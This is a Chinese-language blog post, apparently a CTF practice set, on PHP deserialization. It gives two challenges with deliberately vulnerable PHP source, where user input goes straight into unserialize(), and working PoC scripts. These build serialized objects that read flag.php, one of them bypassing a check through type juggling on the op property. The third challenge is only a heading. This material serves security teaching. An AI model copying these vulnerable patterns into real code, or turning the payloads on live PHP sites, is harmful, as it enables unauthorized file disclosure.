题库：PHP反序列化

Posted 2021-08-13 南瓜__pumpkin

文章目录

• • 第1题：简单的反序列化利用
  • 第2题：绕过WAF的反序列化利用
  • 第3题：预计pop利用链，涉及class之间的调用

---

第1题：简单的反序列化利用

  题目地址：120.55.195.183/MyPractice/php-unserialize/test0/index.php。云服务器过期了，源码如下。
  （1）index.php

<?php
    header("content-type:text/html;charset=utf-8");
    highlight_file(__FILE__);

//入门第一题
//class：只有一个class，不涉及class之间的调用
//跳板方法：是class中的readfile()方法，不是class中的__destruct()
    

    require_once('class.php');
    $x = new Shield();
    isset($_GET['class']) && $g = $_GET['class'];
    if (!empty($g)) {
        $x = unserialize($g);
    }
    echo $x->readfile();
?>

  （2）class.php

<?php
    highlight_file(__FILE__);
    //flag is in flag.php
    class Shield {
        public $file;
        function __construct($filename = '') {
            $this -> file = $filename;
        }
        function readfile() {
            if (!empty($this->file) && stripos($this->file,'..')===FALSE  
            && stripos($this->file,'/')===FALSE && stripos($this->file,'\\\\')==FALSE) {
                return @file_get_contents($this->file);
            }
        }
    }
?>

  （3）poc.php，自行编写flag.php

<?php

highlight_file(__FILE__);
class Shield {
        public $file;
        function __construct($filename = '') {
            $this -> file = $filename;
        }
}

$x = new Shield();
$x->file = "flag.php";

echo serialize($x); 

---

第2题：绕过WAF的反序列化利用

  来源[网鼎杯 2020 青龙组]AreUSerialz。题目地址：120.55.195.183/MyPractice/php-unserialize/test1/index.php。
  （1）index.php

<?php

//入门第2题
//[网鼎杯 2020 青龙组]AreUSerialz。考察点：单类class的WAF绕过。

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

  （2）poc.php

<?php
class FileHandler {

    public $op;
    public $filename;
    public $content;
}
$x = new FileHandler();
$x->op=2;
$x->filename="flag.php";
echo serialize($x);
?>

  

---

第3题：预计pop利用链，涉及class之间的调用